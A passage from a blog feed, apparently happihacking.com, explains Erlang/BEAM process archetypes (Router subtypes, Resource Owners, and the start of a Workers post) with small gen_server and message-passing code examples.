&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; an Observer. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;monitor &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; messages&lt;/li&gt;
&lt;li&gt;restart failing processes&lt;/li&gt;
&lt;li&gt;track health&lt;/li&gt;
&lt;li&gt;enforce invariants&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; a Resource Owner. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;hold domain state&lt;/li&gt;
&lt;li&gt;own a session, connection, or user&lt;/li&gt;
&lt;li&gt;aggregate or accumulate data&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;if-a-process-starts-helping-out-it-is-no-longer-just-a-routerit-is-not-necessarily-always-bad-but-it-makes-it-harder-toreason-about-the-system&quot; tabindex=&quot;-1&quot;&gt;If a process starts “helping out,” it is no longer (just) a Router.
It is not necessarily always bad, but it makes it harder to
reason about the system.&lt;/h2&gt;
&lt;h1 id=&quot;router-subtypes&quot; tabindex=&quot;-1&quot;&gt;Router Subtypes&lt;/h1&gt;
&lt;p&gt;These are the Router types you actually see in real systems. They fit the
archetype precisely and avoid stepping into Gatekeeper or Observer
responsibilities.&lt;/p&gt;
&lt;h2 id=&quot;1-broadcaster-fan-out&quot; tabindex=&quot;-1&quot;&gt;1. Broadcaster: Fan Out&lt;/h2&gt;
&lt;p&gt;One message comes in. Many messages go out.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({broadcast, Msg}, State) -&amp;gt;
    [Pid ! Msg || Pid &amp;lt;- State#state.subscribers],
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pub/sub&lt;/li&gt;
&lt;li&gt;cache invalidations&lt;/li&gt;
&lt;li&gt;event fan-out&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No filtering. No rate control. No state. Pure fan-out.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;2-director-route-to-the-right-process&quot; tabindex=&quot;-1&quot;&gt;2. Director: Route to the Right Process&lt;/h2&gt;
&lt;p&gt;The classic Router. Looks at metadata, picks exactly one target.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({msg, UserId, Data}, State) -&amp;gt;
    Pid = maps:get(UserId, State#state.sessions),
    Pid ! Data,
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;user/session routing&lt;/li&gt;
&lt;li&gt;mapping logical IDs to processes&lt;/li&gt;
&lt;li&gt;request dispatch inside a system&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Directors are the backbone of large BEAM systems.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;3-load-balancer-and-worker-pools&quot; tabindex=&quot;-1&quot;&gt;3. Load Balancer and Worker Pools&lt;/h2&gt;
&lt;p&gt;A &lt;strong&gt;load balancer&lt;/strong&gt; is a Router that picks one worker out of many using a simple, predictable strategy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;round-robin&lt;/li&gt;
&lt;li&gt;hash-based&lt;/li&gt;
&lt;li&gt;random&lt;/li&gt;
&lt;li&gt;“lowest mailbox length”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Routers can keep lightweight routing metadata (like a counter for
round-robin), but nothing domain-specific or persistent. The job is
routing, not state.&lt;/p&gt;
&lt;p&gt;This is exactly what the process in front of a worker pool does. The pool
manager in poolboy and similar libraries is a &lt;strong&gt;Router&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it receives a job&lt;/li&gt;
&lt;li&gt;picks a worker&lt;/li&gt;
&lt;li&gt;forwards the job&lt;/li&gt;
&lt;li&gt;and stops there&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The workers behind the pool may also act as &lt;strong&gt;Resource Owners&lt;/strong&gt; if they
hold long-lived resources (like a DB connection), but that does not change
the Router’s role. It is still just forwarding messages.&lt;/p&gt;
&lt;p&gt;The key property remains: the Router does &lt;strong&gt;not&lt;/strong&gt; apply backpressure or
enforce limits. If it starts doing that, it is no longer (just) a Router,
it has become a Gatekeeper.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;4-demultiplexer-message-splitter&quot; tabindex=&quot;-1&quot;&gt;4. Demultiplexer (Message Splitter)&lt;/h2&gt;
&lt;p&gt;Split one inbound stream into several logical channels based on message
shape.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;case Event of
    {audit, D}      -&amp;gt; AuditPid ! D;
    {analytics, D}  -&amp;gt; AnalyticsPid ! D;
    {telemetry, D}  -&amp;gt; TelemetryPid ! D
end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;separating analytics from real-time paths&lt;/li&gt;
&lt;li&gt;multi-purpose message streams&lt;/li&gt;
&lt;li&gt;protocol front-ends&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Demuxing is classification only.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;5-multiplexer-message-merger&quot; tabindex=&quot;-1&quot;&gt;5. Multiplexer (Message Merger)&lt;/h2&gt;
&lt;p&gt;A Multiplexer is the reverse of a Demultiplexer: many inbound streams, one
unified forward path. It simply forwards messages from several sources into
a single output channel.&lt;/p&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;bridging legacy single-threaded systems&lt;/li&gt;
&lt;li&gt;merging updates from several producers&lt;/li&gt;
&lt;li&gt;simplifying downstream processing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pure multiplexing is &lt;strong&gt;still just forwarding&lt;/strong&gt;.
No buffering. No priority. No state.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;when-multiplexers-drift-into-state&quot; tabindex=&quot;-1&quot;&gt;When Multiplexers Drift Into State&lt;/h3&gt;
&lt;p&gt;Sometimes you want more than merging.
For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;you need &lt;strong&gt;ordering across streams&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;batch or aggregate&lt;/strong&gt; messages before sending them
downstream&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;emit one combined payload&lt;/strong&gt; (e.g. a JSON array or binary
packet)&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;coordinate replies&lt;/strong&gt; from multiple workers before acting&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The moment you introduce:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;buffering&lt;/li&gt;
&lt;li&gt;collecting&lt;/li&gt;
&lt;li&gt;waiting for multiple sources&lt;/li&gt;
&lt;li&gt;sequencing&lt;/li&gt;
&lt;li&gt;assembling a single final result&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;…you are no longer implementing a Router.&lt;/p&gt;
&lt;p&gt;You have quietly moved into &lt;strong&gt;Resource Owner&lt;/strong&gt; (state + transformation) or
&lt;strong&gt;Gatekeeper&lt;/strong&gt; territory (sequencing, synchronization).&lt;/p&gt;
&lt;p&gt;That isn’t wrong, but it is a different archetype.&lt;/p&gt;
&lt;p&gt;A Router does not shape &lt;em&gt;when&lt;/em&gt; messages flow or &lt;em&gt;how many&lt;/em&gt; messages become
one. It only shapes &lt;em&gt;where&lt;/em&gt; messages flow.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;6-protocol-router&quot; tabindex=&quot;-1&quot;&gt;6. Protocol Router&lt;/h2&gt;
&lt;p&gt;Routes based on protocol, after the smallest possible decoding step.&lt;/p&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;TCP front-ends handling several protocols&lt;/li&gt;
&lt;li&gt;gateways&lt;/li&gt;
&lt;li&gt;hybrid endpoints (WebSocket + HTTP + JSON-RPC)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Protocol Router chooses handlers based on &lt;em&gt;shape&lt;/em&gt;, not behaviour.
If it enforces rules or validates messages, it becomes a Gatekeeper.&lt;/p&gt;
&lt;p&gt;Here is a minimal, slightly contrived example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% protocol_router.erl

handle_info({tcp, Sock, Bin}, State) -&amp;gt;
    case decode(Bin) of
        {http, ReqBin} -&amp;gt;
            State#state.http_handler ! {Sock, ReqBin};

        {jsonrpc, JsonBin} -&amp;gt;
            State#state.jsonrpc_handler ! {Sock, JsonBin};

        {websocket, FrameBin} -&amp;gt;
            State#state.ws_handler ! {Sock, FrameBin};

        _Other -&amp;gt;
            %% Unknown protocol: hand off to a generic handler
            State#state.fallback_handler ! {Sock, Bin}
    end,
    inet:setopts(Sock, [{active, once}]),
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;decode/1&lt;/code&gt; function does only the bare minimum required to classify the message:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;decode(&amp;lt;&amp;lt; &amp;quot;{&amp;quot;, _/binary &amp;gt;&amp;gt; = Bin) -&amp;gt;
    {jsonrpc, Bin};

decode(&amp;lt;&amp;lt;&amp;quot;GET &amp;quot;, _/binary&amp;gt;&amp;gt; = Bin) -&amp;gt;
    {http, Bin};

decode(&amp;lt;&amp;lt;0x81, _/binary&amp;gt;&amp;gt; = Bin) -&amp;gt;
    {websocket, Bin};

decode(Bin) -&amp;gt;
    {unknown, Bin}.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id=&quot;key-points&quot; tabindex=&quot;-1&quot;&gt;Key points&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The Router reads bytes from the socket.&lt;/li&gt;
&lt;li&gt;Performs a &lt;strong&gt;minimal test&lt;/strong&gt; to classify the protocol, not a full parse.&lt;/li&gt;
&lt;li&gt;Forwards the original payload to the appropriate handler.&lt;/li&gt;
&lt;li&gt;Does not enforce sequencing, limits, authentication, or retries.&lt;/li&gt;
&lt;li&gt;Keeps no state beyond handler PIDs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-note-of-caution&quot; tabindex=&quot;-1&quot;&gt;A note of caution&lt;/h3&gt;
&lt;p&gt;In a real system, you probably &lt;strong&gt;do not want to parse the payload inside
the Router&lt;/strong&gt;. Parsing large JSON or WebSocket frames in the Router turns it
into a bottleneck, or a denial-of-service surface. A flood of oversized
JSON messages can stall the Router, preventing it from classifying the next
packet.&lt;/p&gt;
&lt;p&gt;As Richard Carlsson pointed out in a review of this post:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A Protocol Router should avoid parsing payloads.
It should classify quickly and forward immediately.
Let the handler process deal with parsing and errors.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;7-shard-router&quot; tabindex=&quot;-1&quot;&gt;7. Shard Router&lt;/h2&gt;
&lt;p&gt;A particular instance of a Director with predictable routing based on key
hashing.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;Shard = erlang:phash2(Key, NumShards),
lists:nth(Shard, ShardPids) ! Msg.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;per-user or per-account isolation&lt;/li&gt;
&lt;li&gt;scalable ledger domains&lt;/li&gt;
&lt;li&gt;consistent partitioning&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Shard Routers create &lt;strong&gt;isolation boundaries&lt;/strong&gt;, not ordering guarantees.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Routers keep the village moving. They don’t decide &lt;em&gt;when&lt;/em&gt; messages should
flow, or &lt;em&gt;how fast&lt;/em&gt;, or &lt;em&gt;what happens if something goes wrong&lt;/em&gt;. They only
decide &lt;strong&gt;where&lt;/strong&gt; messages go.&lt;/p&gt;
&lt;p&gt;Keeping Routers simple makes debugging obvious and system behaviour
predictable. If you give a Router too much responsibility, it stops being a
Router.&lt;/p&gt;
&lt;p&gt;Next up: &lt;strong&gt;Gatekeepers&lt;/strong&gt;, the archetype that actually cares about flow,
limits, and containment. They do the work Routers deliberately refuse to
do.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Resource Owners: One Process, One Piece of State</title>
    <link href="https://happihacking.com/blog/posts/2025/resource_owners/"/>
    <updated>2025-11-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/resource_owners/</id>
    <summary>The boring, reliable center of most good systems</summary>
    <content type="html">&lt;h2 id=&quot;the-gnome-who-guards-the-chest-of-gold&quot; tabindex=&quot;-1&quot;&gt;The Gnome Who Guards the Chest of Gold&lt;/h2&gt;
&lt;p&gt;In the gnome village, not every gnome runs around performing tasks. Some
stay in one place, holding on to something important. A chest of gold. A
ledger. A cart. A user session. They don&#39;t roam, they don&#39;t multitask, and
they are not easily distracted. They are predictable by design.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnome_owner.png&quot; alt=&quot;A happy gnome
holding the key to the treasure chest.&quot; title=&quot;A Gnome with a key.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Everything that touches that piece of state goes through this gnome. No
exceptions. No secret shortcuts. No shared cupboards where anyone can slip
in and &amp;quot;just update one field&amp;quot;.&lt;/p&gt;
&lt;p&gt;The Resource Owner archetype is simple: one process owns one thing.&lt;/p&gt;
&lt;p&gt;Everyone else sends requests. The Resource Owner decides what happens. It
enforces the rules, updates the state, and ensures that invariants stay
invariant. If two other gnomes want to withdraw from the same chest of gold
at the same time, this gnome decides the order. There are no races, only
queues.&lt;/p&gt;
&lt;p&gt;A Resource Owner doesn&#39;t need locks, because no one else is allowed to
touch the chest. It doesn&#39;t need coordination protocols, because the
mailbox does the serialization.&lt;/p&gt;
&lt;p&gt;You can send as many messages as you want. The Resource Owner handles them
one at a time. It is boring, reliable, and honest work. In other words: the
foundation of most good systems.&lt;/p&gt;
&lt;p&gt;Workers run around doing tasks. Resource Owners sit still and make sure
those tasks don&#39;t break anything.&lt;/p&gt;
&lt;p&gt;If you&#39;ve ever wondered why BEAM systems behave sensibly under concurrency
pressure, this is the reason. There is always a gnome with the key to the
chest, and everyone in the village respects that arrangement.&lt;/p&gt;
&lt;h2 id=&quot;what-exactly-is-a-resource-owner&quot; tabindex=&quot;-1&quot;&gt;What Exactly Is a Resource Owner?&lt;/h2&gt;
&lt;p&gt;A Resource Owner is the simplest idea that people consistently
overcomplicate.&lt;/p&gt;
&lt;p&gt;It is a process whose entire job is to own one piece of state.
All interaction with that state happens through the process.&lt;/p&gt;
&lt;p&gt;Because the Resource Owner has a mailbox, it automatically serializes
access. Two concurrent updates become a queue, not a race. The process
handles one message at a time, in order, and applies the change cleanly.&lt;/p&gt;
&lt;p&gt;OTP encourages you to write these as a &lt;code&gt;gen_server&lt;/code&gt;. For very simple owners
you don&#39;t have to. A simple receive loop works just as well. The behaviour
module is convenience, not magic.&lt;/p&gt;
&lt;p&gt;For anything more complex, a &lt;code&gt;gen_server&lt;/code&gt; gives you a lot for free: code
upgrades, casts and calls, and a familiar interface.&lt;/p&gt;
&lt;p&gt;A Resource Owner is not a Worker. Workers do things: calculations, I/O,
external calls. Resource Owners protect things: the chest of gold, the
cart, the payment intent, the ledger entry.&lt;/p&gt;
&lt;p&gt;If a Worker needs to modify a resource, it does not touch the state itself.
It sends a message to the Resource Owner. The Worker may be short-lived.
The Resource Owner is the stable part of the system.&lt;/p&gt;
&lt;h2 id=&quot;a-minimal-example&quot; tabindex=&quot;-1&quot;&gt;A Minimal Example&lt;/h2&gt;
&lt;p&gt;Here is the smallest useful Resource Owner: a process that owns a counter.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(counter_owner).
-export([start_link/0, increment/1, value/1]).

start_link() -&amp;gt;
    spawn_link(fun() -&amp;gt; loop(0) end).

increment(Counter) -&amp;gt;
    Counter ! {self(), increment},
    receive
        {Counter, Reply} -&amp;gt; Reply
    end.

value(Counter) -&amp;gt;
    Counter ! {self(), get},
    receive
        {Counter, V} -&amp;gt; V
    end.

loop(State) -&amp;gt;
    receive
        {From, increment} -&amp;gt;
            New = State + 1,
            From ! {self(), ok},
            loop(New);

        {From, get} -&amp;gt;
            From ! {self(), State},
            loop(State)
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This tiny process gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One owner of one integer.&lt;/li&gt;
&lt;li&gt;Serialized access without locks.&lt;/li&gt;
&lt;li&gt;Predictable updates.&lt;/li&gt;
&lt;li&gt;No race conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ten, a hundred, or a thousand increments can arrive concurrently. They all
go through the same process. The mailbox turns concurrency into a queue.&lt;/p&gt;
&lt;p&gt;This is the smallest form of a Resource Owner. The larger forms follow the
same principle, just with more interesting state.&lt;/p&gt;
&lt;p&gt;Resource Owners come in two flavours. The first group are Entity Owners.
The second are Aggregators.&lt;/p&gt;
&lt;h2 id=&quot;entity-owners&quot; tabindex=&quot;-1&quot;&gt;Entity Owners&lt;/h2&gt;
&lt;p&gt;Entity Owners represent logical domain state. They are the small, polite
gnomes guarding individual pieces of your system&#39;s model:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a socket or DB connection&lt;/li&gt;
&lt;li&gt;a shopping cart or user session&lt;/li&gt;
&lt;li&gt;an order or payment intent&lt;/li&gt;
&lt;li&gt;a chat room or game entity&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you can point at it in your domain and say &amp;quot;this thing has identity and
state,&amp;quot; it can probably be represented as an Entity Owner.&lt;/p&gt;
&lt;p&gt;These processes are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Long-lived and tied to an ID&lt;/li&gt;
&lt;li&gt;Started when needed, shut down when finished&lt;/li&gt;
&lt;li&gt;The single authority on the rules of that entity (for example, &amp;quot;a balance
must not go negative&amp;quot;)&lt;/li&gt;
&lt;li&gt;A natural fit for the BEAM, because the mailbox gives you serialization
without locks, and the process gives you isolation without drama&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-shopping-cart-owner&quot; tabindex=&quot;-1&quot;&gt;A Shopping Cart Owner&lt;/h3&gt;
&lt;p&gt;Here is a simple cart owner. It holds items, enforces quantity rules, and
exposes the current state on request. The API uses the cart ID directly,
so callers don&#39;t need to track PIDs. One process per cart ID. If you know
the ID, you know the owner.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(cart_owner).
-behaviour(gen_server).

-record(state, {id, items = #{}}).

-export([start_link/1, add_item/3, get_items/1]).
-export([init/1, handle_call/3, handle_cast/2]).

start_link(CartId) -&amp;gt;
    gen_server:start_link({local, {cart, CartId}},
                          ?MODULE, CartId, []).

add_item(CartId, ItemId, Qty) when Qty &amp;gt; 0 -&amp;gt;
    gen_server:call({cart, CartId}, {add, ItemId, Qty}).

get_items(CartId) -&amp;gt;
    gen_server:call({cart, CartId}, get_items).

init(CartId) -&amp;gt;
    {ok, #state{id = CartId}}.

handle_call({add, ItemId, Qty}, _From,
            #state{items = Items} = St) -&amp;gt;
    Current = maps:get(ItemId, Items, 0),
    NewItems = Items#{ItemId =&amp;gt; Current + Qty},
    {reply, ok, St#state{items = NewItems}};

handle_call(get_items, _From,
            #state{items = Items} = St) -&amp;gt;
    {reply, Items, St}.

handle_cast(_Msg, St) -&amp;gt;
    {noreply, St}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In real systems you would probably use a process registry (gproc, pg, or a
via callback) instead of &lt;code&gt;{local, ...}&lt;/code&gt;, but this is enough to show the
idea.&lt;/p&gt;
&lt;p&gt;Two concurrent &amp;quot;add item&amp;quot; requests arrive for the same cart. The mailbox
queues them. The first completes, updates the map, and replies. The second
sees the updated state and proceeds. No locks, no retries. Just order.&lt;/p&gt;
&lt;p&gt;This is why Entity Owners feel like cheating when you first encounter them.
You stop writing defensive code and start writing real logic.&lt;/p&gt;
&lt;h3 id=&quot;lifecycle&quot; tabindex=&quot;-1&quot;&gt;Lifecycle&lt;/h3&gt;
&lt;p&gt;Entity Owners are not global daemons. They exist only when needed.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When the first request comes in, a supervisor starts the process.&lt;/li&gt;
&lt;li&gt;When the entity is complete, idle, or expired, it shuts down.&lt;/li&gt;
&lt;li&gt;If the process crashes, supervision restarts it, either fresh or from
persisted state.&lt;/li&gt;
&lt;li&gt;Because its state is isolated, a crash only affects that one entity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the kind of failure you want in production: local, predictable, and
obvious.&lt;/p&gt;
&lt;h3 id=&quot;pitfalls&quot; tabindex=&quot;-1&quot;&gt;Pitfalls&lt;/h3&gt;
&lt;p&gt;Entity Owners are simple. People make them complicated. Here are the usual
ways:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The God Entity.&lt;/strong&gt; One process ends up owning far too much: user profile,
cart, settings, metrics, half the application. This becomes a serialization
bottleneck. Also: painful to debug.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A backpack full of boulders.&lt;/strong&gt; The process holds megabytes of state:
giant maps, binary blobs, or entire chat histories. Result: GC pauses, high
memory usage, and slow everything. Move big state to ETS or external
storage.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Doing I/O inside the entity.&lt;/strong&gt; The process starts calling remote APIs,
writing to disk, or running SQL queries. This blocks the mailbox, inflates
response times, and converts a clean design into a subtle disaster.&lt;/p&gt;
&lt;p&gt;The fix is always the same: Entity Owners guard state. Workers do work.
Keep them separate.&lt;/p&gt;
&lt;h3 id=&quot;entities-with-lifecycles&quot; tabindex=&quot;-1&quot;&gt;Entities with Lifecycles&lt;/h3&gt;
&lt;p&gt;Some entities have a clear lifecycle: created, authorized, captured,
cancelled. For those, &lt;code&gt;gen_statem&lt;/code&gt; is often a better fit than &lt;code&gt;gen_server&lt;/code&gt;.
The Resource Owner idea is the same (one process owns the intent) but the
behaviour makes state transitions explicit. I will cover that pattern in a
later post.&lt;/p&gt;
&lt;h2 id=&quot;aggregators&quot; tabindex=&quot;-1&quot;&gt;Aggregators&lt;/h2&gt;
&lt;p&gt;Aggregators hold a derived or accumulated state, not a domain entity.&lt;/p&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;metrics collector&lt;/li&gt;
&lt;li&gt;sliding window counters&lt;/li&gt;
&lt;li&gt;real-time rollups (moving averages, sensor data)&lt;/li&gt;
&lt;li&gt;batch builders&lt;/li&gt;
&lt;li&gt;log aggregators before flushing to storage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Often time-based, window-based, or count-based.&lt;/li&gt;
&lt;li&gt;State is constantly updated.&lt;/li&gt;
&lt;li&gt;Output is periodic or triggered.&lt;/li&gt;
&lt;li&gt;Often respond to queries for current aggregated status.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-simple-metrics-owner&quot; tabindex=&quot;-1&quot;&gt;A Simple Metrics Owner&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(metrics_owner).
-behaviour(gen_server).

-record(state, {count = 0, sum = 0}).

-export([start_link/0, record/1, get_mean/0]).
-export([init/1, handle_call/3, handle_cast/2]).

start_link() -&amp;gt;
    gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).

record(Value) -&amp;gt;
    gen_server:cast(?MODULE, {record, Value}).

get_mean() -&amp;gt;
    gen_server:call(?MODULE, get_mean).

init([]) -&amp;gt;
    {ok, #state{}}.

handle_cast({record, Value}, #state{count = C, sum = S} = St) -&amp;gt;
    {noreply, St#state{count = C + 1, sum = S + Value}};

handle_cast(_Msg, St) -&amp;gt;
    {noreply, St}.

handle_call(get_mean, _From, #state{count = 0} = St) -&amp;gt;
    {reply, undefined, St};

handle_call(get_mean, _From, #state{count = C, sum = S} = St) -&amp;gt;
    {reply, S / C, St}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Callers send latency values with &lt;code&gt;record/1&lt;/code&gt;. The owner accumulates count
and sum. Anyone can ask for the current mean. The state stays bounded, the
interface stays simple. In real code you would want a better return type
than &lt;code&gt;undefined&lt;/code&gt;, but you get the idea.&lt;/p&gt;
&lt;h3 id=&quot;pitfalls-for-aggregators&quot; tabindex=&quot;-1&quot;&gt;Pitfalls for Aggregators&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unbounded state growth.&lt;/strong&gt; Sliding windows need pruning. Batch builders
need flush triggers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Holding giant binaries.&lt;/strong&gt; If you keep references to large binaries, the
BEAM cannot reclaim them. Copy what you need.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mixing aggregation with heavy computation.&lt;/strong&gt; Keep the owner thin.
Offload expensive work to Workers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;pooled-resources&quot; tabindex=&quot;-1&quot;&gt;Pooled Resources&lt;/h2&gt;
&lt;p&gt;A pooled &amp;quot;Worker&amp;quot; holding a DB connection, socket, or crypto context is
actually a Resource Owner. It holds state (the connection), but it behaves
like a Worker while serving a request. The pool provides concurrency
control; the process provides state semantics.&lt;/p&gt;
&lt;p&gt;This is one of the few legitimate role combinations. Keep the pooled
process thin. If it starts doing heavy logic, split it: one process owns
the connection, another does the work.&lt;/p&gt;
&lt;h2 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h2&gt;
&lt;p&gt;Resource Owners give you correctness by construction.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Entity Owners: one process per domain entity.&lt;/li&gt;
&lt;li&gt;Aggregators: one process per rolling or accumulated state.&lt;/li&gt;
&lt;li&gt;Pooled resources: a valid hybrid, but keep them thin.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Prefer simple ownership over shared state or locking systems. The mailbox
is your serialization primitive. Use it.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Workers: Do One Job, Then Get Out of the Way</title>
    <link href="https://happihacking.com/blog/posts/2025/workers/"/>
    <updated>2025-11-22T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/workers/</id>
    <summary>Short-lived processes, polite pools, and where people overcomplicate things</summary>
    <content type="html">&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/worker.jpg&quot; alt=&quot;Happi with
a hardhat working with power tools.&quot; title=&quot;Happi as a worker and poolboy.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In the gnome village, a &lt;strong&gt;Worker&lt;/strong&gt; is the simplest citizen you can have.&lt;/p&gt;
&lt;p&gt;You give it a task.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It does the task.&lt;/li&gt;
&lt;li&gt;It reports back.&lt;/li&gt;
&lt;li&gt;It disappears.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That is the whole contract.&lt;/p&gt;
&lt;p&gt;On the BEAM, this maps directly to one of the most useful patterns you can
have: &lt;strong&gt;spawn a process per unit of work&lt;/strong&gt;. You get isolation, concurrency,
and fault containment almost for free. When that is not enough, you add a
pool.&lt;/p&gt;
&lt;p&gt;This post is about Workers as a process archetype: how they behave, when to
use them, when to pool them, and when you’re just building your own problem
factory.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;short-lived-workers-the-default&quot; tabindex=&quot;-1&quot;&gt;Short-Lived Workers: the default&lt;/h1&gt;
&lt;p&gt;The simplest Worker is a short-lived process:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;do(Input) -&amp;gt;
  Caller = self(),
  Ref = make_ref(),
  Worker = spawn(fun() -&amp;gt;
                   Result = do_one_job(Input),
                   Caller ! {self(), Ref, Result}
                end),
  receive
    {Worker, Ref, Result} -&amp;gt; Result
    after 5000 -&amp;gt; exit({timeout, Worker, Input})
  end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It has no history. No future. No shared state. It exists purely to handle one piece of work and then die.&lt;/p&gt;
&lt;p&gt;This works extremely well for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sending emails.&lt;/li&gt;
&lt;li&gt;Writing audit logs.&lt;/li&gt;
&lt;li&gt;Calling external APIs.&lt;/li&gt;
&lt;li&gt;Performing background calculations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You could create a worker template:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;worker_do(Fun, Input, Timeout) -&amp;gt;
  Caller = self(),
  Ref = make_ref(),
  Worker = spawn(fun() -&amp;gt;
                   Result = Fun(Input),
                   Caller ! {self(), Ref, Result}
                end),
  receive
    {Worker, Ref, Result} -&amp;gt; Result
    after Timeout -&amp;gt; log({timeout, Worker, Input})
  end.
&lt;/code&gt;&lt;/pre&gt;
